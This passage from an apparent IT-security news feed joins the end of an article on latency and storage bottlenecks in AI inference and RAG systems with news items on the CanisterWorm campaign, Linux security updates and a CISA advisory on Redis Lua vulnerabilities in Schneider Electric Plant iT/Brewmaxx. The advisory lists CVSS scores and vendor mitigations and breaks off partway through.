<p>This is bandwidth hungry. Parallelism and throughput matter. Latency is often less visible than in interactive workloads, but when training stretches from days to weeks, it is frequently a data path problem. </p>



<h3 class="wp-block-heading">Shape 2: Inference and RAG </h3>



<ul class="wp-block-list">
<li>Bursty request patterns  </li>
</ul>



<ul class="wp-block-list">
<li>Many small reads (vector search, metadata, prompt artifacts)  </li>
</ul>



<ul class="wp-block-list">
<li>High fan-out and fan-in across services  </li>
</ul>



<ul class="wp-block-list">
<li>Tail latency dominates  </li>
</ul>



<p>Most CIO conversations I have are about inference, because that is where customer experience, employee productivity and revenue workflows live. That means the architecture should be optimized for consistency, not just peak throughput. </p>



<h2 class="wp-block-heading">Three failure modes I see constantly </h2>



<h3 class="wp-block-heading">1) GPUs look busy, but they are not productive </h3>



<p>I have seen GPU utilization in the 60 to 80 percent range while tokens per second stayed flat and queues kept growing. The system looked “loaded,” but it was not delivering more outcomes. </p>



<p>In practice, the fix is often not “more GPUs.” It is better batching and memory management in the serving layer, so GPUs spend more time generating tokens and less time context switching or waiting for fragmented work. </p>



<p>Serving engines like <a href="https://docs.vllm.ai/en/stable/configuration/optimization/" target="_blank" rel="noreferrer noopener">vLLM</a> are useful here because they treat inference performance as a tunable discipline. You can tune batching, scheduling and memory behavior to balance throughput with TTFT and TPOT under real concurrency.  </p>



<p><strong>Pattern I rely on:</strong> Separate the front door (API gateway, auth, rate limits) from the batching brain (LLM serving engine). Optimize for TTFT and TPOT, not just concurrency. </p>



<h3 class="wp-block-heading">2) East-to-west traffic quietly eats your latency budget </h3>



<p>RAG workloads are network hungry. A single prompt can trigger: </p>



<ul class="wp-block-list">
<li>embedding lookup  </li>
</ul>



<ul class="wp-block-list">
<li>vector search  </li>
</ul>



<ul class="wp-block-list">
<li>metadata fetch  </li>
</ul>



<ul class="wp-block-list">
<li>document chunk fetch  </li>
</ul>



<ul class="wp-block-list">
<li>rerank  </li>
</ul>



<ul class="wp-block-list">
<li>prompt assembly  </li>
</ul>



<ul class="wp-block-list">
<li>LLM call  </li>
</ul>



<p>Even if each hop is “fast on average,” the p99 gets ugly under load because the pipeline is chatty and synchronous. The system starts to feel like the model is slow when the real issue is that your request spends too much time traveling. </p>



<p><strong>Pattern I rely on:</strong> Collapse hops where possible, co-locate latency sensitive services and treat network round trips as a scarce resource. A simple rule I use is this: Do not let your p99 depend on a long chain of synchronous calls. </p>



<h3 class="wp-block-heading">3) Storage becomes the hidden queue </h3>



<p>In inference systems, storage rarely looks saturated at the device level. The problem is usually the data path: Too many copies, too much CPU involvement and too many small metadata operations that show up as tail latency. </p>



<p>I like to explain the principle using GPUDirect Storage, even if you do not implement it. <a href="https://docs.nvidia.com/gpudirect-storage/overview-guide/index.html" target="_blank" rel="noreferrer noopener">NVIDIA</a> describes GPUDirect Storage as enabling a more direct DMA path between storage and GPU memory, reducing CPU overhead and latency by avoiding extra copies. </p>



<p>You do not need that exact technology to benefit from the lesson. </p>



<p><strong>Pattern I rely on:</strong> Make the data path boring. Fewer copies. Fewer layers. Fewer handoffs. </p>



<h2 class="wp-block-heading">Unified data services beat siloed performance wins </h2>



<p>I have watched teams chase a 20% performance gain in one tier while ignoring the bigger issue: data fragmentation. </p>



<p>If your AI pipeline bounces across disconnected file, object and block systems, you keep paying the hop tax. You also increase the chance that “the right data” is not where the model expects it to be. </p>



<p><a href="https://www.ibm.com/solutions/ai-storage" target="_blank" rel="noreferrer noopener">IBM’s AI storage</a> framing is helpful because it emphasizes unified storage approaches that consolidate file, block and object services while integrating with existing investments, to deliver data at scale with low latency. </p>



<p>Translated into an enterprise goal, this means fewer copies, fewer bridges and fewer places where tail latency can hide. </p>



<h2 class="wp-block-heading">Content-aware storage and RAG: An underused lever </h2>



<p>Here is a point that does not get enough attention. RAG is not only about models and vector databases. It is also about whether your enterprise can make unstructured data retrievable without turning the data estate into a copy machine. </p>



<p><a href="https://www.ibm.com/solutions/ai-storage" target="_blank" rel="noreferrer noopener">IBM</a> notes that very little enterprise data is used to train the large language models behind assistants, limiting business value and highlights “content-aware” approaches that extract semantic meaning from unstructured data so assistants can answer more intelligently. </p>



<p>I like this framing because it shifts the conversation from “store more data” to “make data usable where it already lives.” That is often the difference between a RAG system that scales and one that becomes a governance and cost problem. </p>



<h2 class="wp-block-heading">The metrics I track now (and why they work) </h2>



<p>When I am asked what to measure, I keep it simple. I want metrics that map to user experience and capacity decisions. </p>



<h3 class="wp-block-heading">Inference experience </h3>



<ul class="wp-block-list">
<li>TTFT p95 and p99  </li>
</ul>



<ul class="wp-block-list">
<li>TPOT p95 and p99  </li>
</ul>



<ul class="wp-block-list">
<li>Tokens per second per GPU  </li>
</ul>



<ul class="wp-block-list">
<li>Queue time before execution  </li>
</ul>



<p><a href="https://github.com/mlcommons/inference_policies/blob/master/inference_rules.adoc?" target="_blank" rel="noreferrer noopener">MLCommons</a> is a good anchor here because TTFT and TPOT are benchmarked precisely to capture user-visible behavior. </p>



<h3 class="wp-block-heading">Network health </h3>



<ul class="wp-block-list">
<li>Service-to-service latency p95 and p99  </li>
</ul>



<ul class="wp-block-list">
<li>Retransmits and packet loss  </li>
</ul>



<ul class="wp-block-list">
<li>East to west throughput per node  </li>
</ul>



<ul class="wp-block-list">
<li>Queue depth in the network path during peak load  </li>
</ul>



<h3 class="wp-block-heading">Storage health </h3>



<ul class="wp-block-list">
<li>Read latency p95 and p99  </li>
</ul>



<ul class="wp-block-list">
<li>IOPS and bandwidth at the namespace or volume level  </li>
</ul>



<ul class="wp-block-list">
<li>Cache hit rates  </li>
</ul>



<ul class="wp-block-list">
<li>Metadata operation rate and latency (the sleeper issue)  </li>
</ul>



<h3 class="wp-block-heading">System efficiency </h3>



<ul class="wp-block-list">
<li>GPU active time vs waiting time  </li>
</ul>



<ul class="wp-block-list">
<li>CPU utilization and softirq time on serving nodes  </li>
</ul>



<ul class="wp-block-list">
<li>Fan-out per prompt and per request type  </li>
</ul>



<h2 class="wp-block-heading">Two real-world use cases (with quantified outcomes) </h2>



<p>These examples reflect patterns I have seen repeatedly. The numbers are representative and meant to show the shape of the problem, not promise identical results in every environment. </p>



<h3 class="wp-block-heading">Use case 1: RAG assistant that “felt slow” even with plenty of GPU </h3>



<p><strong>Symptoms</strong> </p>



<ul class="wp-block-list">
<li>TTFT p95 drifted from about 0.7s to about 2.2s during peak hours  </li>
</ul>



<ul class="wp-block-list">
<li>TPOT p95 stayed acceptable, but the first response felt delayed  </li>
</ul>



<ul class="wp-block-list">
<li>GPU utilization looked fine, but queue time rose steadily  </li>
</ul>



<p><strong>Root cause</strong> </p>



<ul class="wp-block-list">
<li>Vector search and chunk retrieval created bursty east to west traffic  </li>
</ul>



<ul class="wp-block-list">
<li>Too many synchronous hops and too little caching of hot content  </li>
</ul>



<ul class="wp-block-list">
<li>Network tail latency amplified fan-out  </li>
</ul>



<p><strong>Fix pattern</strong> </p>



<ul class="wp-block-list">
<li>Co-located vector search and document store for hot shards  </li>
</ul>



<ul class="wp-block-list">
<li>Cached top-k retrieved chunks and prompt templates  </li>
</ul>



<ul class="wp-block-list">
<li>Added asynchronous retrieval and progressive context loading for long documents  </li>
</ul>



<p><strong>Outcome</strong> </p>



<ul class="wp-block-list">
<li>TTFT p95 returned near baseline under similar user load  </li>
</ul>



<ul class="wp-block-list">
<li>Fewer p99 spikes because the pipeline depended on fewer synchronous calls  </li>
</ul>



<ul class="wp-block-list">
<li>Modest improvement in tokens per second because fewer requests stalled on I/O  </li>
</ul>



<h3 class="wp-block-heading">Use case 2: Adding GPUs did not improve throughput </h3>



<p><strong>Symptoms</strong> </p>



<ul class="wp-block-list">
<li>Tokens per second increased only about 10 percent after adding 25 percent more GPUs  </li>
</ul>



<ul class="wp-block-list">
<li>TPOT p99 worsened under concurrency  </li>
</ul>



<ul class="wp-block-list">
<li>CPU utilization spiked on serving nodes  </li>
</ul>



<p><strong>Root cause</strong> </p>



<ul class="wp-block-list">
<li>Serving layer batching and memory churn wasted GPU cycles  </li>
</ul>



<ul class="wp-block-list">
<li>Storage path added extra copies and CPU overhead for artifacts  </li>
</ul>



<ul class="wp-block-list">
<li>Scheduling placed workloads on nodes without the right NIC or storage locality  </li>
</ul>



<p><strong>Fix pattern</strong> </p>



<ul class="wp-block-list">
<li>Tuned the serving engine to match request size distribution and concurrency behavior (vLLM tuning is a good reference point for this type of work)  </li>
</ul>



<ul class="wp-block-list">
<li>Improved device-aware placement using Kubernetes device plugin patterns so specialized hardware is advertised cleanly to the scheduler  </li>
</ul>



<ul class="wp-block-list">
<li>Reduced CPU bounce buffering behavior in the data path where feasible  </li>
</ul>



<p><a href="https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/device-plugins/" target="_blank" rel="noreferrer noopener">The Kubernetes device plugin framework</a> is the simple building block behind making “specialized resources” schedulable at scale. </p>



<p><strong>Outcome</strong> </p>



<ul class="wp-block-list">
<li>More linear scaling as GPUs were added  </li>
</ul>



<ul class="wp-block-list">
<li>Stabilized TPOT p99 because fewer requests were blocked behind slow neighbors  </li>
</ul>



<ul class="wp-block-list">
<li>Reduced CPU overhead, freeing headroom for networking and observability  </li>
</ul>



<h2 class="wp-block-heading">Open source that fits these patterns </h2>



<p>You can implement most of these improvements using open-source components: </p>



<ul class="wp-block-list">
<li><strong>Observability:</strong> Prometheus, Grafana, OpenTelemetry and eBPF-based tooling to see flow-level latency and fan-out.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Caching:</strong> Redis for hot key/value caching; local NVMe caches for hot artifacts.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Serving:</strong> <a href="https://docs.vllm.ai/en/stable/configuration/optimization/" target="_blank" rel="noreferrer noopener">vLLM</a> for configurable batching and memory behavior under load. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Scheduling:</strong> Kubernetes device plugins and resource-aware node pools for GPU and NIC locality. (Kubernetes device plugins:)  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Storage:</strong> Ceph is a common open-source option for software-defined block, file and object patterns. IBM also calls out <a href="https://www.ibm.com/solutions/ai-storage" target="_blank" rel="noreferrer noopener">IBM AI Storage</a> Ceph as an open source, software-defined approach aligned to these needs.  </li>
</ul>



<h2 class="wp-block-heading">Limitations and tradeoffs </h2>



<p>Every performance win has an operational cost. These are the tradeoffs I plan for. </p>



<ol start="1" class="wp-block-list">
<li>Caching improves consistency, but invalidation is hard. Freshness, permissions and compliance requirements complicate “simple” caches.  </li>
</ol>



<ol start="2" class="wp-block-list">
<li>Device-aware scheduling improves performance, but increases complexity. You introduce <a href="https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/device-plugins/" target="_blank" rel="noreferrer noopener">Kubernetes device plugins</a>, operators and topology awareness. It is worth it, but it must be managed. </li>
</ol>



<ol start="3" class="wp-block-list">
<li>Reducing copies can improve latency, but raises platform constraints. Direct data paths reduce CPU overhead, but they come with configuration and compatibility requirements.  </li>
</ol>



<ol start="4" class="wp-block-list">
<li>Unifying data services reduces silos, but consolidation needs governance. A unified approach can reduce hop tax, but only if access control, lifecycle policies and ownership are clear.  </li>
</ol>



<h2 class="wp-block-heading">Future scope: What will matter more next </h2>



<p>Over the next 12 to 24 months, I expect four themes to grow: </p>



<ul class="wp-block-list">
<li><strong>AI SLOs become standard:</strong> TTFT and TPOT become operational targets, not just benchmark terms.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Workload placement becomes policy-driven:</strong> Placement logic becomes strategic, spanning hybrid footprints.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>More GPU-centric data paths:</strong> Fewer CPU copies and less context switching where possible.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>RAG becomes “information supply chain” first:</strong> Content-aware approaches and unified data services reduce re-copying and re-governing the same data. </li>
</ul>



<h2 class="wp-block-heading">What I would tell a CIO in an elevator pitch </h2>



<p>If you want AI to feel fast and reliable, stop treating it like a model deployment and start treating it like a distributed system with strict tail latency expectations. </p>



<p>Measure TTFT and TPOT in percentiles. Map your pipeline fan-out. Make network and storage visible. Then apply disciplined patterns: Isolate lanes, cache aggressively, schedule intelligently, reduce copies in the data path and unify data services where it makes sense. </p>



<p>Your GPUs will thank you, but more importantly, your users will. </p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.<br></strong><a href="https://www.networkworld.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CanisterWorm Targets Docker, Kubernetes, and Redis to Steal Secrets]]></title>
<description><![CDATA[A financially motivated cybercrime group known as TeamPCP is actively exploiting poorly secured cloud environments using a self-propagating malware called “CanisterWorm.” The campaign targets exposed Docker APIs, Kubernetes clusters, Redis servers, and known vulnerabilities like React2Shell to ga...]]></description>
<link>https://tsecurity.de/de/3392111/it-security-nachrichten/canisterworm-targets-docker-kubernetes-and-redis-to-steal-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3392111/it-security-nachrichten/canisterworm-targets-docker-kubernetes-and-redis-to-steal-secrets/</guid>
<pubDate>Mon, 30 Mar 2026 09:21:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated cybercrime group known as TeamPCP is actively exploiting poorly secured cloud environments using a self-propagating malware called “CanisterWorm.” The campaign targets exposed Docker APIs, Kubernetes clusters, Redis servers, and known vulnerabilities like React2Shell to gain unauthorized access,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/canisterworm-targets-docker-kubernetes-and-redis-to-steal-secrets/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/canisterworm-targets-docker-kubernetes-and-redis-to-steal-secrets/">CanisterWorm Targets Docker, Kubernetes, and Redis to Steal Secrets</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CanisterWorm Targets Docker, Kubernetes, and Redis to Steal Secrets]]></title>
<description><![CDATA[A financially motivated cybercrime group known as TeamPCP is actively exploiting poorly secured cloud environments using a self-propagating malware called “CanisterWorm.” The campaign targets exposed Docker APIs, Kubernetes clusters, Redis servers, and known vulnerabilities like React2Shell to ga...]]></description>
<link>https://tsecurity.de/de/3392086/it-security-nachrichten/canisterworm-targets-docker-kubernetes-and-redis-to-steal-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3392086/it-security-nachrichten/canisterworm-targets-docker-kubernetes-and-redis-to-steal-secrets/</guid>
<pubDate>Mon, 30 Mar 2026 09:06:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated cybercrime group known as TeamPCP is actively exploiting poorly secured cloud environments using a self-propagating malware called “CanisterWorm.” The campaign targets exposed Docker APIs, Kubernetes clusters, Redis servers, and known vulnerabilities like React2Shell to gain unauthorized access, steal credentials, and extort victims. The activity escalated over the past weekend with a destructive […]</p>
<p>The post <a href="https://gbhackers.com/canisterworm-targets-docker/">CanisterWorm Targets Docker, Kubernetes, and Redis to Steal Secrets</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in redis (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3388258/unix-server/security-ausfuehren-beliebiger-kommandos-in-redis-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3388258/unix-server/security-ausfuehren-beliebiger-kommandos-in-redis-suse/</guid>
<pubDate>Sat, 28 Mar 2026 07:36:21 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium), Fedora (chromium, containernetworking-plugins, musescore, and python-multipart), Mageia (perl-XML-Parser, roundcubemail, trilead-ssh2, vim, and webkit2), Oracle (389-ds:1.4, gimp:2.8, glibc, gnutls, kernel, libarchive, nginx:1.24, opencrypto...]]></description>
<link>https://tsecurity.de/de/3380459/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3380459/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 25 Mar 2026 15:24:36 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium), <b>Fedora</b> (chromium, containernetworking-plugins, musescore, and python-multipart), <b>Mageia</b> (perl-XML-Parser, roundcubemail, trilead-ssh2, vim, and webkit2), <b>Oracle</b> (389-ds:1.4, gimp:2.8, glibc, gnutls, kernel, libarchive, nginx:1.24, opencryptoki, python3, uek-kernel, vim, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (delve, osbuild-composer, and skopeo), <b>Slackware</b> (mozilla), <b>SUSE</b> (dpkg, go1.26-openssl, gstreamer-plugins-ugly, kernel, libssh, ovmf, python-pyasn1, python-tornado6, python311, salt, sqlite3, and systemd), and <b>Ubuntu</b> (linux-aws-fips, linux-azure, linux-azure-fips, linux-fips, linux-gcp-fips, linux-iot, linux-kvm, pjproject, and redis).]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in Redis (Ubuntu)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3378221/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3378221/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-redis-ubuntu/</guid>
<pubDate>Tue, 24 Mar 2026 22:37:12 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Schneider Electric Plant iT/Brewmaxx]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could risk privilege escalation, which could result in remote code execution.
The following versions of Schneider Electric Plant iT/Brewmaxx are affected:

Plant iT/Brewmaxx 9.60_and_above (CVE-2025-49844, CVE-2025-46817, CVE-2025...]]></description>
<link>https://tsecurity.de/de/3377474/it-security-nachrichten/schneider-electric-plant-itbrewmaxx/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3377474/it-security-nachrichten/schneider-electric-plant-itbrewmaxx/</guid>
<pubDate>Tue, 24 Mar 2026 17:37:27 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-083-03.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could risk privilege escalation, which could result in remote code execution.</strong></p>
<p>The following versions of Schneider Electric Plant iT/Brewmaxx are affected:</p>
<ul>
<li>Plant iT/Brewmaxx 9.60_and_above (CVE-2025-49844, CVE-2025-46817, CVE-2025-46818, CVE-2025-46819)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.9</td>
<td>Schneider Electric</td>
<td>Schneider Electric Plant iT/Brewmaxx</td>
<td>Use After Free, Integer Overflow or Wraparound, Improper Control of Generation of Code ('Code Injection')</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Energy, Critical Manufacturing, Commercial Facilities</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>France</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49844</a></h3>
<div class="csaf-accordion-content">
<p>The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate the garbage collector, trigger a use-after-free, and potentially lead to remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49844">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric Plant iT/Brewmaxx</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>Schneider Electric Plant iT/Brewmaxx: 9.60_and_above</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Schneider Electric recommends users immediately apply the following mitigations to reduce the risk of exploit:</p>
<p><strong>Mitigation</strong><br>Install Patch ProLeiT-2025-001 via ProLeiT Support<br><a href="https://www.proleit.com/support/">https://www.proleit.com/support/</a></p>
<p><strong>Mitigation</strong><br>After installing ProLeiT-2025-001, disable the eval commands in Redis on the application server, VisuHub, engineering workstations, and workstations with emergency mode functionality</p>
<p><strong>Mitigation</strong><br>Force usage of secure Redis configuration templates in system settings as documented in the patch manual</p>
<p><strong>Mitigation</strong><br>Restart all patched servers and workstations</p>
<p><strong>Mitigation</strong><br>Schneider Electric strongly recommends the following industry cybersecurity best practices.</p>
<p><strong>Mitigation</strong><br>Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.</p>
<p><strong>Mitigation</strong><br>Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.</p>
<p><strong>Mitigation</strong><br>Place all controllers in locked cabinets and never leave them in the "Program" mode.</p>
<p><strong>Mitigation</strong><br>Never connect programming software to any network other than the network intended for that device.</p>
<p><strong>Mitigation</strong><br>Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.</p>
<p><strong>Mitigation</strong><br>Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.</p>
<p><strong>Mitigation</strong><br>Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.</p>
<p><strong>Mitigation</strong><br>When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.</p>
<p><strong>Mitigation</strong><br>For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.<br><a href="https://www.se.com/us/en/download/document/7EN52-0390/">https://www.se.com/us/en/download/document/7EN52-0390/</a></p>
<p><strong>Vendor fix</strong><br>For more information, see Schneider Electric security notification "SEVD-2026-013-01 Multiple Third-Party Vulnerabilities on ProLeiT Plant iT/Brewmaxx"<br><a href="https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf">https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.9</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-46817</a></h3>
<div class="csaf-accordion-content">
<p>The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to cause an integer overflow and potentially lead to remote code execution</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-46817">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric Plant iT/Brewmaxx</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>Schneider Electric Plant iT/Brewmaxx: 9.60_and_above</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Schneider Electric recommends users immediately apply the following mitigations to reduce the risk of exploit:</p>
<p><strong>Mitigation</strong><br>Install Patch ProLeiT-2025-001 via ProLeiT Support<br><a href="https://www.proleit.com/support/">https://www.proleit.com/support/</a></p>
<p><strong>Mitigation</strong><br>After installing ProLeiT-2025-001, disable the eval commands in Redis on the application server, VisuHub, engineering workstations, and workstations with emergency mode functionality</p>
<p><strong>Mitigation</strong><br>Force usage of secure Redis configuration templates in system settings as documented in the patch manual</p>
<p><strong>Mitigation</strong><br>Restart all patched servers and workstations</p>
<p><strong>Mitigation</strong><br>Schneider Electric strongly recommends the following industry cybersecurity best practices.</p>
<p><strong>Mitigation</strong><br>Locate control and safety system networks and remote devices behind firewalls and isolate them from the business network.</p>
<p><strong>Mitigation</strong><br>Install physical controls so no unauthorized personnel can access your industrial control and safety systems, components, peripheral equipment, and networks.</p>
<p><strong>Mitigation</strong><br>Place all controllers in locked cabinets and never leave them in the "Program" mode.</p>
<p><strong>Mitigation</strong><br>Never connect programming software to any network other than the network intended for that device.</p>
<p><strong>Mitigation</strong><br>Scan all methods of mobile data exchange with the isolated network such as CDs, USB drives, etc. before use in the terminals or any node connected to these networks.</p>
<p><strong>Mitigation</strong><br>Never allow mobile devices that have connected to any other network besides the intended network to connect to the safety or control networks without proper sanitation.</p>
<p><strong>Mitigation</strong><br>Minimize network exposure for all control system devices and systems and ensure that they are not accessible from the Internet.</p>
<p><strong>Mitigation</strong><br>When remote access is required, use secure methods, such as virtual private networks (VPNs). Recognize that VPNs may have vulnerabilities and should be updated to the most current version available. Also, understand that VPNs are only as secure as the connected devices.</p>
<p><strong>Mitigation</strong><br>For more information refer to the Schneider Electric Recommended Cybersecurity Best Practices document.<br><a href="https://www.se.com/us/en/download/document/7EN52-0390/">https://www.se.com/us/en/download/document/7EN52-0390/</a></p>
<p><strong>Vendor fix</strong><br>For more information, see Schneider Electric security notification "SEVD-2026-013-01 Multiple Third-Party Vulnerabilities on ProLeiT Plant iT/Brewmaxx"<br><a href="https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf">https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-013-01&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-013-01.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-46818</a></h3>
<div class="csaf-accordion-content">
<p>The affected product uses Redis, an open-source, in-memory database. Versions 8.2.1 and below allow an authenticated user to use a specially crafted Lua script to manipulate different LUA objects and potentially run their own code in the context of another user.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-46818">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Schneider Electric Plant iT/Brewmaxx</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Schneider Electric</div>
<div class="ics-version"><strong>Product Version:</strong><br>Schneider Electric Plant iT/Brewmaxx: 9.60_and_above</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Schneider Electric recommends users immediately apply the following mitigations to reduce the risk of exploit:</p>
<p><strong>Mitigation</strong><br>Install Patch ProLeiT-2025-001 via ProLeiT Support<br><a href="https://www.proleit.com/support/">https://www.proleit.com/support/</a></p>
